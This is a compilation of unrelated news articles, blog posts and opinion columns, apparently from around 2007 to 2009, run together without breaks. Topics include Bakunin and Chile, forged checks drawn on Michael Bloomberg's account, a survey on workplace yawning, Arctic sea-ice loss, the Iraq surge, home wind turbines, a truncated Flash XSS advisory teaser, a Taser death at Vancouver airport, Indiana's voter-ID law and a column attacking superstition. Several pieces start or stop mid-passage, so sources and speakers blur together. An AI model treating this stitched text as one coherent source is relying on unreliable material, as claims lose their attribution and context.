. . were we to force the practical life of men - collective as well as individual - into rigorous and exclusive conformity with the latest data of science , we would thus condemn society as well as individuals to suffer martyrdom on a Procrustean bed , which would soon dislocate and stifle them , since life is always an infinitely greater thing than science . "
[ The Political Philosophy of Bakunin , ed. G.P. Maximov , p. 79 ]
The Chilean experience of rule by free market ideologues prove Bakunin 's points beyond doubt .
Chilean society was forced onto the Procrustean bed by the use of terror and life was forced to conform to the assumptions found in economics textbooks .
And as we proved above , only those with power or wealth did well out the experiment .
Updated , 5:30 p.m. |
You might think a man worth at least $ 5 billion would hardly notice if $ 400,000 or so went missing .
But someone noticed .
The Manhattan district attorney , Robert M. Morgenthau , announced this afternoon that two men had been charged with stealing or attempting to steal from personal financial accounts belonging to Mayor Michael R. Bloomberg .
One man , Odalis Bostic , was indicted for trying to steal $ 420,000 from the mayor .
According to prosecutors , Mr. Bostic created the Laderman Development Company in Elizabeth , N.J. , and set up accounts in the company ’s name at two banks , PNC and Sovereign Bank .
In early June , Mr. Bostic deposited a $ 190,000 forged check into the Sovereign account and a $ 230,000 forged check into PNC account , according to prosecutors .
Both of the forged checks were drawn on Mr. Bloomberg ’s personal account at the Bank of America and were issued in the name of the mayor ’s financial manager , Geller & Company .
The mayor ’s personal account information appeared on both checks , but because of the size of the checks , the two banks put holds on the transactions .
The banks determined that the checks were forged and then contacted the authorities .
Mr. Bostic , who was arrested in New Jersey in August and waived extradition , was to be arraigned today in State Supreme Court on a charge of attempted grand larceny in the second degree , a felony punishable by up to seven years in prison .
In the course of the investigation into the forged checks , an unrelated fraud was discovered , Mr. Morgenthau said .
A second man , Charles Nelson , has been charged with stealing $ 10,000 from one of the mayor ’s financial accounts on May 11 .
In an online transaction , Mr. Nelson transferred $ 10,000 from the mayor ’s Bank of America account to an E* Trade account the defendant had set up , prosecutors said .
They said he later used a debit card for cash advances and to make purchases from the E*Trade account .
Mr. Nelson was arrested in Newark , and a computer , documents and two guns were recovered through search warrants .
He remains in custody in New Jersey on local charges , but has been charged in New York with grand larceny in the third degree and identity theft in the first degree , both felonies punishable by up to seven years in prison .
Mr. Morgenthau credited Detective Drew Barone of the Police Department ’s Special Frauds Unit and Christopher Romanyshyn of the New Jersey attorney general ’s office for their work on the case .
A Manhattan assistant district attorney , Jeremy B. Glickman , who is assigned to the Identity Theft Unit , was assigned to handle the prosecution .
A City Hall spokesman , John P. Gallagher , declined to comment on the matter .
This was not the first time criminals have gone after the mayor .
Before he was elected in 2001 , he helped officials build a case against a man from Kazakhstan who prosecutors say tried to extort money from Mr. Bloomberg ’s financial services company , Bloomberg L.P .
Federal prosecutors said the man , Oleg Zezev , sent threatening e-mail messages in March 2000 to Mr. Bloomberg , in which Mr. Zezev said he had infiltrated the company ’s computer system and wanted $ 200,000 in exchange , he said , for helping the company fix its computer security lapses .
Mr. Bloomberg contacted the F.B.I. and exchanged e-mail messages with Mr. Zezez .
Eventually , he flew to London and met with Mr. Zezev , and an accomplice , Igor Yarimaka , who was also from Kazakhstan , in a hotel .
The meeting was secretly recorded by police officers from Scotland Yard , using a hidden camera .
In February 2003 , Mr. Bloomberg testified at Mr. Zezev ’s trial .
Mr. Zezev was convicted of extortion and sentenced to 51 months in prison .
The charges against Mr. Yarimaka were dropped .
Editor 's note : CNN.com has a business partnership with CareerBuilder.com , which serves as the exclusive provider of job listings and services to CNN.com .
( CareerBuilder.com ) --
Try a couple of things for me :
The next time you 're in a meeting , yawn -- watch and see how many people follow suit .
While you 're reading this , count how many times you yawn .
Not because the following information will bore you ( at least I hope not ) -- keep reading and you 'll see why .
The theories surrounding the cause of yawning are abundant .
One is that our body stimulates yawns to draw in more oxygen or remove built - up carbon dioxide .
Another is that yawning began with our ancestors , who yawned to show their teeth and intimidate others .
A different -- and more common -- conjecture is that we are just plain tired .
Nearly half ( 46 percent ) of Americans feel they are more tired than ever before , according to a new survey conducted by Harris Interactive and commissioned by Diet Pepsi MAX .
More importantly , 31 percent blames the workplace as the culprit of their sleepiness .
Check out some findings on sleepiness in the workplace and other fun survey results .
Afternoon slump
Majority ( 60 percent ) of Americans are tired in the afternoon , causing 84 percent to go through an " afternoon slump . "
" It 's evident that Americans are tired , " says Russell Weiner , vice president of Colas , Pepsi-Cola North America .
" Most hit a slump at some point in their day , usually while they 're at work . "
Sixty - six percent of Americans admit to experiencing a slump at least three days a week , while half of those people crash five or more days .
The biggest slump occurs between 3 p.m. and 5 p.m. , according to the survey , which was also the same time that 23 percent , say they yawn the most .
So what do you do when you feel like you just ... ( Head nod ) can 't ... ( Eyes closing ) stay awake ?
Fifty - two percent of Americans drink a caffeinated beverage while 58 percent walk around the office to get out of their slump .
Asleep on the job
Speaking of nodding off , turns out American 's are n't so good at keeping their eyes open in the workplace .
A whopping 50 percent of those surveyed say they 've caught someone sleeping at work , not to mention the 28 percent who admit they 've fallen asleep at work themselves .
Little - known - fact : Auto mechanics ( 65 percent ) have the highest rate of self - admitted snoozing on the job , followed by 51 percent of government workers .
Having trouble staying awake ?
Follow these pointers from " The Worst - Case Scenario Survival Handbook : Work , " by Joshua Piven and David Borgenicht , on how to cover if you 're caught sleeping at your desk .
Blame work .
Say , " I 'm so exhausted ; I was here until midnight last night ! "
Do not attempt this if your boss works late and you do not .
Blame medication .
Claim that your new allergy medicine has been making you drowsy .
Say , " Those antihistamines just knock me out ! "
Blame lunch .
Say , " Wow , I guess I should not have eaten that turkey sandwich .
Triptophan really makes me sleepy ! "
Meetings make me yawn
If turkey sandwiches do n't make you sleep , a nice , long , pointless meeting will do the trick .
Fifty - eight percent of all survey respondents have yawned in a meeting and nearly one in five Americans feel embarrassed about it .
Washington , D.C. led the nation as the city where people are mostly likely to yawn in a meeting , with 69 percent having done so .
Piven and Borgenicht say warning signs of meeting fatigue include inattentiveness , back tension , shallow breathing , frequent blinking , heavy eyelids and snoring .
Follow their tips to stay awake :
Be on guard for mind - numbing repetition .
Repetitive noise patterns and repetitive images can cause a trance - like state that deadens the senses .
If phrases like " need better communication " and " building a team " are repeated , or if tables , graphs and pie charts are projected endlessly , exit the room for a few minutes .
Wear sunglasses .
The harsh glare of fluorescent lights can cause eye strain and lead to fatigue .
Wear dark glasses .
Use interrogation techniques .
Pinch yourself , sit in an uncomfortable position , poke your leg with a pen or paper clip , or stare wide - eyed at a bright - light -- the pain will heighten your awareness .
Crazy yawning facts
Eighty - five percent of Americans do n't believe yawning at work should have professional repercussions , while 38 percent of older adults ( age 62 + ) feel it should n't happen while on the job .
Fifty - four percent of working Americans say they would take a nap at work if given permission by their supervisor .
While more than two - thirds ( 67 percent ) of people living on the West Coast would like to nap at work , 43 percent of those living in the Midwest are opposed to the idea .
Men ( 36 percent ) fall asleep at work twice as much as women ( 19 percent ) .
Brunettes ( 19 percent ) are more than twice likely as blondes ( 9 percent ) to be teased at work for yawning , even though blondes are more likely to yawn during meetings .
E-mail to a friend
Copyright CareerBuilder.com 2009 .
All rights reserved .
The information contained in this article may not be published , broadcast or otherwise distributed without the prior written authority
' Tis the season in the Arctic when the sun disappears below the horizon and twilight replaces daylight .
Temperatures drop and ice that melted throughout the Arctic summer begins to cover the world 's northernmost ocean again .
Scientists have used satellite pictures since 1979 to map the extent of such ice at its minimum , and the picture this year is n't pretty .
Covering 1.59 million square miles ( 4.12 million square kilometers ) , this summer 's sea ice shattered the previous record for the smallest ice cap of 2.05 million square miles ( 5.31 million square kilometers ) in 2005 — a further loss of sea ice area equivalent to the states of California and Texas combined .
" The sea ice cover this year has reached a new record low , " says Mark Serreze , senior research scientist at the U.S. National Snow and Ice Data Center in Boulder , Colo .
" It 's not just that we beat the old record , we annihilated it . "
As a result of atmospheric patterns that both warmed the air and reduced cloud cover as well as increased residual heat in newly exposed ocean waters , such melting helped open the fabled Northwest Passage for the first time [ see photo ] this summer and presaged tough times for polar bears and other Arctic animals that rely on sea ice to survive , according to the U.S. Geological Survey .
Such precipitous loss of ice cover far outpaces anything climate models or scientists have predicted .
This new record low continues the trend of steadily shrinking summer sea ice .
" We 're already set up for a big loss next year , " Serreze notes .
" We 've got so much open water in the Arctic right now that has absorbed so much energy over the summer that the ocean has warmed .
The ice that grows back this autumn will be thin . "
In fact , a German expedition on the icebreaker Polarstern has revealed that existing Arctic sea ice in the center of the ice cap is only about three feet ( one meter ) thick , 50 percent thinner than it was just six years ago .
As a result , more melt water is mixing with the salty seawater and pulses of warmer Atlantic seawater have intruded into the Arctic Ocean .
Whereas the South Pole remains protected by differing geographic , atmospheric and oceanic conditions , the North Pole is undergoing rapid change not seen in at least 6,000 years and perhaps as much as 125,000 years , and which may spread to lower latitudes .
" It is reasonable to think that if you lose the sea ice cover that is going to have an impact elsewhere , in the midlatitudes , " Serreze says .
Some modeling studies of such effects have suggested drought in the western U.S. or changes in precipitation patterns across Europe .
Serreze expects the ice will bounce back somewhat next year , if only because he cannot imagine it shrinking any more so swiftly .
But ice - free summers in the Arctic may become the norm in the near future .
" At this point , I 'd say the year 2030 is not unreasonable " for a summer without sea ice in the Arctic , Serreze says .
" Within our lifetimes and certainly within our children 's lifetimes . "
When that occurs , the Arctic Ocean may become a spooky , foggy place , haunted by diminished populations of spectrally thin polar bears clinging to life in residual habitat .
" It 's going to be a different world , " Serreze notes .
" The observed rates of change have far outstripped what we projected . "
I just do n’t understand it .
National Geographic Magazine has some fantastic environmental articles , and its environmental credentials as regards to editorial objectiveness and openness are second to none .
It ’s just a shame that no one at NG told the advertising department this .
Open any edition of National Geographic and you will find a host of advertisements promoting big cars , big trucks , airlines and long - haul holidays .
This is a magazine that pushes carbon consumption harder that any other .
And then you go to their web site and find this :
“ From saving forest canopies to forging elephant corridors , the [ National Geographic ] Conservation Trust is dedicated to preservation around the globe . ”
Very good .
And this is just one of their many initiatives .
They have many more initiatives on the advertising side , proudly boasting in their Sales Kit :
“ National Geographic magazine enjoys an intensely loyal readership with some of the most influential consumers in the world .
As opinion leaders , they are affluent , well educated , and professional – and have discretionary income to purchase quality products and services . ” ( my emphasis )
So , National Geographic readers , you are loyal , you are powerful and you are rich , and that ’s why you will put up with and respond to hoards of adverts for products that are destroying the Earth .
Well , here ’s one former reader who wo n’t be buying National Geographic again .
Good riddance .
President Bush capped off his administration ’s weeklong campaign to convince America that the “ surge ” is working with a televised address on Thursday .
Nestled among assorted pseudo - announcements and stale slogans was a telling pitch from a president who has repeatedly revised his motive for war : “ Our mission in Iraq will evolve . ”
The surreal timeline of the Iraq war is littered with moments like these — too many about - faces and nonsensical blunders to keep a firm grip on reason .
Bush invaded a country to rid it of imaginary weapons of mass destruction .
When he did n’t find any , he declared victory and changed the mission to democracy building .
When that strategy led to a theocratic government unresponsive to sectarian bloodletting , the mission became about stability .
And now , the one goal supporters of the war seem determined to realize is to achieve some vague , if delusory , sense of victory .
So , the president tells us , as we attempt to follow his circuitous logic , that the mission is evolving , as though it were some determined organism destined to adapt to adversity and thrive .
“ General Petraeus also recommends that in December , we begin transitioning to the next phase of our strategy in Iraq .
As terrorists are defeated , civil society takes root , and the Iraqis assume more control over their own security , our mission in Iraq will evolve , ” Bush proclaimed from his Oval Office desk on Thursday .
“ Over time , our troops will shift from leading operations , to partnering with Iraqi forces , and eventually to overwatching those forces .
As this transition in our mission takes place , our troops will focus on a more limited set of tasks , including counterterrorism operations and training , equipping and supporting Iraqi forces . ”
Does n’t that sound wonderful ?
Terrorists defeated , civil society taking root — it ’s almost enough to make us forget we ’ve heard it all before .
That ’s just the problem with propaganda in the Information Age — fact travels as fast as fiction .
Take , for instance , the president ’s and Gen. Petraeus ’ celebration of Anbar province , which they would have us believe is Iraq ’s answer to Beverly Hills , thanks to the surge .
The administration ’s insistence aside , only 38 percent of Anbar residents rate security positively , and one of America ’s much publicized allies in the region , Abdul - Sattar Abu Risha , was just assassinated .
How many soldiers had to die to achieve such stunning success ?
The mission is “ evolving ” because it is the best way to conceal that there is no longer a coherent mission , if there ever was one .
Just ask the surviving members of a brave group of active - duty soldiers who offered their take on the war in a New York Times article they wrote shortly before one of them was critically injured and two others were killed .
Here are just a few insightful excerpts from their seminal essay :
“ Viewed from Iraq at the tail end of a 15 - month deployment , the political debate in Washington is indeed surreal . ”
“ In short , we operate in a bewildering context of determined enemies and questionable allies , one where the balance of forces on the ground remains entirely unclear . ”
“ Four years into our occupation , we have failed on every promise , while we have substituted Baath Party tyranny with a tyranny of Islamist , militia and criminal violence .
When the primary preoccupation of average Iraqis is when and how they are likely to be killed , we can hardly feel smug as we hand out care packages . ”
Well said .
Now if only we could get that on television .
President Bush ’s prepared address : Good evening .
In the life of all free nations , there come moments that decide the direction of a country and reveal the character of its people .
We are now at such a moment .
In Iraq , an ally of the United States is fighting for its survival .
Terrorists and extremists who are at war with us around the world are seeking to topple Iraq ’s government , dominate the region , and attack us here at home .
If Iraq ’s young democracy can turn back these enemies , it will mean a more hopeful Middle East and a more secure America .
This ally has placed its trust in the United States .
And tonight , our moral and strategic imperatives are one :
We must help Iraq defeat those who threaten its future and also threaten ours .
Eight months ago , we adopted a new strategy to meet that objective , including a surge in U.S. forces that reached full strength in June .
This week , General David Petraeus and Ambassador Ryan Crocker testified before Congress about how that strategy is progressing .
In their testimony , these men made clear that our challenge in Iraq is formidable .
Yet they concluded that conditions in Iraq are improving , that we are seizing the initiative from the enemy , and that the troop surge is working .
Read more
Click here to read more about Army Sgt. Omar Mora in the Houston Chronicle .
Domestic " microwind " turbines , recently championed as " power from the people " by opposition leader David Cameron , are about as useful as a chocolate teapot .
A study of domestic turbines was published by renewable energy consultants Encraft in December .
According to the study , only one of the 15 household wind turbines generated enough to power a 75 W light bulb .
The average daily output was 393.3
Watt hours : an average of 17W .
In all , only three of the turbines generated over 400 Watt hours of electricity , with one generating 1,790 Watt hours .
Four of the turbines did n't even make it into three figures .
By way of comparison , a washing machine consumes 4 kW ( 4,000W ) , and a fridge - freezer 1.9kW .
[ PDF , 1MB ]
The average turbine also operates at only 1.84 per cent of capacity .
The carbon - obsessed BBC has suggested that a domestic turbine may contribute about " a fifth " of a household 's electricity needs - but the reality is this is only true if the household 's only electricity need is one fifth of a single crack - den - dim light bulb .
The numbers suggests that the turbines would take , at best , 15 years to pay for themselves .
So what 's gone wrong ?
Mind the bats
Encraft stresses it 's early days , which is true - the first 13 sites only went live last January , with 13 more following in October .
However , it appears that the measured windspeed for many sites fell below the predicted figure .
Turbulence in built - up areas makes for poor windflow .
Or as SK Watson , of the Centre for Renewable Energy System Technology at Loughborough University , observes :
" Those areas with higher capacity factor are where urban areas tend not to be ! "
Windspeeds in rural vs urban areas
Worse , the measured energy output from the domestic turbines was far below the " theoretical " energy predicted .
Er , quite .
The trial has suffered other problems .
One turbine was stolen , another damaged , and a further one was beseiged by pro-bat protestors .
Several needed their inverters replacing .
" We have had some reality checks , " Encraft admits .
However , Encraft MD Matthew Rhodes , quoted in The Guardian found one " benefit " from the white elephants .
Apparently , seven out of ten people who see a turbine say it reminds them to save energy .
The logic is , apparently , that when one sees one of these monuments to self - righteousness , one dashes back to turn the lights off .
But surely there must be cheaper ways of inducing feelings of guilt and low self - worth in the general population - such as availing oneself of the latest Radiohead album , perhaps ? ®
Rich Cannings has published an advisory on the Web Security Mailing List describing a flaw on common flash authoring tools allowing for XSS .
From his advisory " THE PROBLEM
Many web authoring tools that automatically generate SWFs insert identical and vulnerable ActionScript into all saved SWFs or necessary controller SWFs ( think of tools ...
Destiny is my science fiction movie about the future of humanity .
It 's an epic , similar in breadth and scope to 2001 : A Space Odyssey .
To see the 18 minute video , click on the graphic below .
Video shows Polish traveler dying after Canadian police use Taser Agence France - Presse
Published : Thursday November 15 , 2007
del.icio.us
Print This Email
This A video showing the dramatic last moments of a Polish immigrant who died after police shocked him with a Taser and restrained him at Vancouver 's airport last month .
Robert Dziekanski , 40 , of Pieszyce , Poland , was tasered and restrained by police on October 14 after going on a rampage out of frustration for waiting 10 hours for his mother .
He spoke no English and died minutes later while being attended by an emergency medical team .
The incident is under investigation by local police , by Canada 's national police complaints commission and by an independent coroner 's service .
The Polish embassy has filed a formal diplomatic note asking Canada for full disclosure of the incident .
Walter Kosteckyj , the victim 's family lawyer , said he was disturbed by the video because Dziekanski was not violent .
" I was expecting to see a confrontation " with police , he told AFP .
The video of Dziekanski's death was released to the media by Paul Pritchard , a Canadian traveler who was at the airport at the time of the incident .
Police had originally taken the recording from Pritchard promising to give it back , but then refused to return it until after Pritchard filed a lawsuit in court .
In the video Dziekanski appears frightened , sweating and exhausted , and speaks to himself in Polish .
Looking agitated , he paces back and forth through an automatic door , which he jams open with chairs and a table .
At one point , he takes a computer off a counter and throws it to the ground , as airport security guards stand close by .
" He 's speaking Russian ... we need a Russian interpreter , " one guard is heard saying in the video .
Four policemen then walk into view .
One says , " How are you sir , " as they all surround Dziekanski , who appears to turn his back on them , trying to move away .
At that point , a policeman hits Dziekanski with a Taser , making him scream .
The immigrant falls , then writhes on the ground with his knees pulled to his chest as all four police officers pin him down .
Seconds later , Dziekanski is seen lying still .
The British Columbia Civil Liberties Association said in a statement that it has filed two formal complaints against the Royal Canadian Mounted Police , " for misrepresenting the facts of Robert Dziekanski 's death and unreasonably seizing and actively suppressing a video recording of the incident . "
On October 13 , Dziekanski , a construction worker who wanted to emigrate to British Columbia where his mother lives , boarded a plane for the first time in his life in Frankfurt , Germany , the family lawyer said .
Because of a mix - up , he waited for 10 hours for his mother in a secure area of the airport , while she waited on the other side of a wall in the public area , Kosteckyj said .
No airport , customs or security employees at the airport apparently tried to help either of them , he added .
Eventually Dziekanski emerged into the public area , but his mother had left and Dziekanski apparently panicked , the lawyer added .
The following video is taken from an October broadcast of CTV , which was uploaded to YouTube by a user last month :
First , let me say that Pylons with its Paste magic is delightful ; lots of nice round edges helped me get something simple up and running in no time , and using genshi to boot .
The new tool , visotank , is ingesting the python - dev mailman archives ( as previously visualized ) and putting them into CouchDB .
The near - term goal is to allow for interactive exploration / visualization of the archives .
The current result , as pictured , is simply sparkline barcharts of people ’s posting history .
Left - to - right , present - to - past , weekly , one ( vertical ) pixel per message , truncating at the image height ( 12 pixels ) .
Although the input processing thus far is specific to mailing list archives , the couchdb schema in use is for generic e-mail traffic .
The messages are even coerced into rfc2822 format for ‘ raw ’ storage .
The ability to use ‘ map ’ multiple times in couchdb views to spread information is delightful .
What I really would like is more reduce functionality or , more specifically , just accumulate .
The sparkbars get their data from statistics with keys [ contact id , timestamp of time period ] and value 1 , one per message .
I would love for couchdb to provide a way to aggregate all those values with identical keys into a single row with the sum as the value .
I ’ll look into this and the view implementation before writing any more on the subject , but if someone out there already knows a way to do this , please let me know .
The Bush administration and top American generals have been vocal in warning that passage of the resolution could cause great harm to the American war effort in Iraq and have put significant pressure on Republicans to abandon their support for the measure .
President Bush called Ms. Pelosi on Tuesday and asked her to prevent a floor vote .
“ The president and the speaker exchanged candid views on the subject and the speaker explained the strong bipartisan support in the House for the resolution , ” said Brendan Daly , a spokesman for Ms. Pelosi .
The Democratic leadership was examining the exact level of that support to gauge its next step , but lawmakers and officials said it was now unclear whether the resolution could be approved , given Republican resistance and Democratic defections .
“ We will have to determine where everyone is , ” said Representative Steny H. Hoyer of Maryland , the majority leader .
Ms. Pelosi , who has promised a vote on the resolution if it cleared the committee , said she was leaving it to its chief backers to round up votes .
“ I have never known a count , ” she said .
Backers of the resolution , which has the fervent support of the Armenian - American community , described the shift as slight and attributed it to the intense lobbying by the Turkish government , the administration and their allies .
They said they would try to change the minds of some of those who were wavering .
“ This is what happens when you are up against a very sophisticated multimillion - dollar campaign , ” said Representative Brad Sherman , Democrat of California , who chided the Turkish government .
“ Since when has it become fashionable for friends to threaten friends ? ”
But he acknowledged there was little margin of error for backers of the resolution , which had once boasted 225 co-sponsors .
“ If the vote were held today , I would not want to bet my house on the outcome , ” he said .
Explicit racism has disappeared from mainstream political discourse in the United States .
Jesse Helms made his long career in Washington by muttering about “ bloc votes , ” but he ’s been gone from the Senate since 2003 , and he has no similarly outspoken successors .
Lest anyone think that racial discrimination itself has been banished from politics , however , Crawford v. Marion County Election Board , a case that will be heard this week by the Supreme Court , provides a disturbing reminder .
One of the lesser outrages of the Supreme Court ’s decision in Bush v. Gore was the banal assertion that “ after the current counting , it is likely legislative bodies nationwide will examine ways to improve the mechanisms and machinery for voting . ”
In fact , the chief “ improvement ” that has come from the legislatures since 2000 is voter - I.D. laws , like the one that gives rise to this week ’s case .
In 2005 , Indiana began requiring voters to present government - issued photo identification before casting a ballot .
( Georgia passed a nearly identical law at about the same time , and several other states have tightened voter - I.D. requirements . )
These laws , their sponsors assured the electorate ( and now the courts ) , were passed to correct the problem of voter fraud .
As the state of Indiana says in its brief to the Justices , the new rule “ establishes reasonable , long - overdue election - security reform in a State highly vulnerable to in - person election fraud . ”
Actually , it is this purported justification that is the real fraud .
The latest and most extensive examination of electoral irregularities , released in November by the nonpartisan research institute Demos , determined that voter fraud was “ very rare , ” and every other respectable study has reached the same conclusion .
This is certainly true in Indiana , where legislators said they were aiming to stop “ voter impersonation , ” which was already a crime in the state ; in the entire history of Indiana , the number of prosecutions for this offense has been zero .
Nationwide , despite an attempt by the Bush Justice Department to crack down on voter fraud , there were only a hundred and twenty federal prosecutions and eighty - six convictions between 2002 and 2006 — a period in which close to four hundred million votes were cast .
“ Let ’s not beat around the bush , ” Terence T. Evans , the dissenting Court of Appeals judge in the Indiana case , slyly wrote .
“ The Indiana voter photo ID law is a not - too - thinly - veiled attempt to discourage election - day turnout by certain folks believed to skew Democratic . ”
He ’s not the only one to notice : the three federal judges who approved the Indiana law were appointed by a Republican President ; the lone dissenter was appointed by a Democrat .
It was also Republican - dominated legislatures that produced the Indiana and Georgia laws , both of which were signed by Republican governors .
Who are the “ certain folks , ” in Judge Evans ’s delicate phrase , that the Indiana law is trying to discourage ?
The best answer can be found in a friend - of - the - court brief in the case filed by twenty - nine leading historians and scholars of voting rights .
They concluded that the Indiana law belongs to a malign tradition in “ this nation ’s history of disfranchising people of color and poor whites under the banner of ‘ reform . ’ ” Such measures as the poll tax and literacy tests , they write , were “ billed as anti-fraud or anti-corruption devices ; yet through detailed provisions within them , they produced a discriminatory effect ( often intended ) within the particular historical context . ”
So it will be in Indiana , where the law creates a series of onerous barriers to voting .
Consider one : you can get a government photo I.D. by showing your birth certificate , but you ca n’t get a copy of your birth certificate unless you can produce certain official photo I.D.s .
And , with up to twenty million Americans of voting age lacking government - issued identification , the matter of requiring photo I.D.s has broad implications .
The Supreme Court case comes at a time when the nation does face a major problem with its elections , but it is the opposite of the one the Indiana law prescribes : it ’s not that too many people are voting but too few .
Voter turnout rose in the 2004 Presidential election , but it still barely reached sixty per cent .
There are any number of ways to begin to address this predicament : holding elections on weekends ; allowing same - day registration and voting by mail , telephone , or the Internet ; permitting registered voters to cast their ballots over several days or weeks ; and putting polling places in shopping malls , to name just a few .
As the Demos report observes , “ Overall , the disfranchisement of voters through antiquated voting systems , errors , mismanagement of registration bases , and intimidation or harassment is a far bigger problem today than traditional forms of election fraud . ”
( These issues , it need hardly be added , were the real problem in Florida in 2000 . )
Unfortunately , the only serious attempt to address the legacy of 2000 , the federal Help America Vote Act , which passed in 2002 , today ranks somewhere between a disappointment and a fiasco .
In essence , that law issued an unfunded mandate to the states to improve their voting procedures by 2006 .
Some states , like New York , largely ignored it ; others , like Florida and Ohio , the states that , respectively , decided the past two Presidential elections , invested in systems that were , in many cases , less reliable than the old ones .
This week , a majority of the Justices will likely find a way to make a bad situation worse , and uphold the Indiana law .
As a general matter , in recent years the Court has been reluctant to find what is charged in this case : a violation of the constitutional guarantee of equal protection of the laws .
( The notable exception , to belabor the issue , was for a plaintiff named George W. Bush . )
In the end , though , it will not be the judiciary that rescues democracy ; whatever the obstacles , the problems with the ballot box must be solved at the ballot box . ♦
Welcome To The Age of " Unenlightenment " Posted by Pile ( 11896 views ) [ E - Mail link ] [ Beating Dead Horses ]
[ Pseudo - Science ] Charlie Brooker of London 's Guardian writes , " In the 18th century , a revolution in thought , known as the Enlightenment , dragged us away from the superstition and brutality of the Middle Ages toward a modern age of science , reason and democracy . "
But now , he claims , we 're entering a new era :
The Unlightenment - in which centuries of rational thought are overturned by the superstitious .
In the 18th century , a revolution in thought , known as the Enlightenment , dragged us away from the superstition and brutality of the Middle Ages toward a modern age of science , reason and democracy .
It changed everything .
If it was n't for the Enlightenment , you would n't be reading this right now .
You'd be standing in a smock throwing turnips at a witch .
Yes , the Enlightenment was one of the most significant developments since the wheel .
Which is why we 're trying to bollocks it all up .
Welcome to a dangerous new era - the Unlightenment - in which centuries of rational thought are overturned by idiots .
Superstitious idiots .
They 're everywhere - reading horoscopes , buying homeopathic remedies , consulting psychics , babbling about " chakras " and " healing energies " , praying to imaginary gods , and rejecting science in favour of soft - headed bunkum .
But instead of slapping these people round the face till they behave like adults , we encourage them .
We 've got to respect their beliefs , apparently .
Well I do n't .
" Spirituality " is what cretins have in place of imagination .
If you 've ever described yourself as " quite spiritual " , do civilisation a favour and punch yourself in the throat until you 're incapable of speaking aloud ever again .
Why should your outmoded codswallop be treated with anything other than the contemptuous mockery it deserves ?
Maybe you 've put your faith in spiritual claptrap because our random , narrative - free universe terrifies you .
But that 's no solution .
If you want comforting , suck your thumb .
Buy a pillow .
Do n't make up a load of floaty blah about energy or destiny .
This is the real world , stupid .
We should be solving problems , not sticking our fingers in our ears and singing about fairies .
Everywhere you look , screaming gittery is taking root , with serious consequences .
The NHS recently spent £ 10 m refurbishing the London Homeopathic Hospital .
The equivalent of 500 nurses ' wages , blown on a handful of magic beans .
That was your tax money .
It was meant for saving lives .
Inevitably , the world of science and logic is slowly fighting back .
Hence the recent slew of anti-God books , one of which , The God Delusion , was written by Richard Dawkins , writer - presenter of The Enemies Of Reason ( Mon , 8 pm , C4 ) .
Dawkins has softened his style somewhat since his previous series , The Root of All Evil , in which he toured the globe interviewing religious extremists .
Trouble was , their views made him so uppity , he occasionally came off worst .
They remained eerily calm , while he huffed furiously .
And because he looks and sounds precisely like Professor Yaffle from Bagpuss , the end effect was often unintentional hilarity .
In The Enemies of Reason he 's still angry - how could n't he be ? - but this time round Dawkins controls his temper , focusing it like a laser beam , taking on spirituality and superstition in all its forms .
The overall tone is less hectoring , more persuasive , and occasionally outright playful .
It 's more likely to win people over .
The end result is possibly the most important broadcast of the year so far ; important because it presents a passionate argument we really all ought to be having right now , if we want to prevent a great slide backwards into mud-eating barbarism .
And if you think that 's hyperbole , I suggest you pick up a newspaper and see how many of the world 's problems are currently being caused or exacerbated by the rejection of rational thought .
From fundamentalist death cults to arrogant invasions : a startling lack of logic unites them all .
Cold , clear , rational thought is the most important thing we have ; the one thing that can save us .
If I was made Emperor of All Media , I 'd broadcast something akin to The Enemies Of Reason on every channel , every day , for 10 years .
This is an urgent message that must be heard if we want to survive , as a species .
Oh .
And I 'd also broadcast a load of Tex Avery cartoons , just to show off my lighter side .
Man , I loves dat Droopy .
Slaves to Superstition is on C4 Mon 13 Aug 2007 8 pm ; part 2 Mon 20 Aug 8pm
Details
Posted by irony .
on 2007-08-13 07:50:28
I revel in the irony of this opinion piece , starting out by painting a picture of barbarism of people standing in muck throwing turnips at witches , and then turns around and starts picking on spirituality , which includes , but is not limited to , contemporary Wicca .
Where 's my turnip ?
I must take a stand for reason ... in the muck , and throw turnips .
Posted by Pile on 2007-08- 13 16:43:40
It there 's anything more consistent among the religious , it 's their tendency to pick on other people just as misguided in their supernatural beliefs .
Posted by Jonny on 2011-02-17 15:50:11
That 's all very well , but please be careful with your indignation .
Sometimes irrational systems produce positive benefits .
My brain - damaged brother spent 3 years having a torrid time in 3 different NHS and private brain injury rehab centres around the country , being grossly mistreated , and having his brain further massacred by lethal cocktails of drugs .
He 's now at a nursing home in Kent which specialises in ' mistletoe therapy ' , homeopathy and stuff involving scented oils .
Now I do n't have any truck with this kind of thing , but ever since he went there he 's been able to ditch all of the anti-psychotic drugs that have been destroying his mind and body , and he 's being looked after by people who care about him .
If NHS funding gets pulled from places like this , because of people who think like you , there 's a group of very vulnerable people out there who will be absolutely buggered .
There are good reasons for this : the main one being that people with as shared ethos -- however irrational -- are often better at acting collectively and with commitment than people without one .
If you do n't believe this story , check out the success rate of adoptions of disabled and troubled kids by the now defunct Catholic adoption agency .
Even rational self - righteousness can land people in a mire .
This cuts both ways
Posted by Johnymt on 2016-01-29 10:42:03
The Age of Unenlightenment has been brewing along nicely for about 40 years or so and is only now becoming the norm across the globe .
Instead of reason and logic , now our world is governed by feelings , opinions and political correctness on the left , and religious dogma on the right .
It is a bi-polar descent into ignorance along with cultural suicide , propagation of ignorance in our schools , abandonment of even rudimentary public civility in our politics and the attempted homogenization of diametrically opposite cultures in the most violent and forceful way possible .
All in the name of " progress " .
Well , my progressive friends , we will reap what we sow .
On that point at least , the bible is spot on .
At the present rate we should all be living in caves again in a few more generations , provided we arent wiped out by AI machines first .
Name : ( change name for anonymous posting ) Title : Comments : 1 Article displayed .
ANNAPOLIS , Md. , June 19 — The presidents of dozens of liberal arts colleges have decided to stop participating in the annual college rankings by U.S. News and World Report .
The decision was announced Tuesday at the end of an annual meeting of the Annapolis Group , a loose association of liberal arts colleges .
After two days of private meetings here , the organization released a statement that said a majority of the 80 presidents attending had “ expressed their intent not to participate in the annual U.S. News survey . ”
The commitment , which some college presidents said was made by a large majority of participants , represents the most significant challenge yet to the rankings , adding colleges like Barnard , Sarah Lawrence and Kenyon to a growing rebellion against the magazine , participants said .
U.S. News says it provides a valuable service to parents and students in its yearly evaluations , which are based on factors that include graduation and retention rates , assessments by competitors , selectivity and faculty resources .
Critics say the ranking system lacks rigor and has had a harmful effect on educational priorities , encouraging colleges to do things like soliciting more applicants and then rejecting them , to move up the list .
Transcript :
Who knew ?
Mensatocracy .
( Television : Enlist !
Fight in Iraq !
Collect a bonus if you do n't die ! )
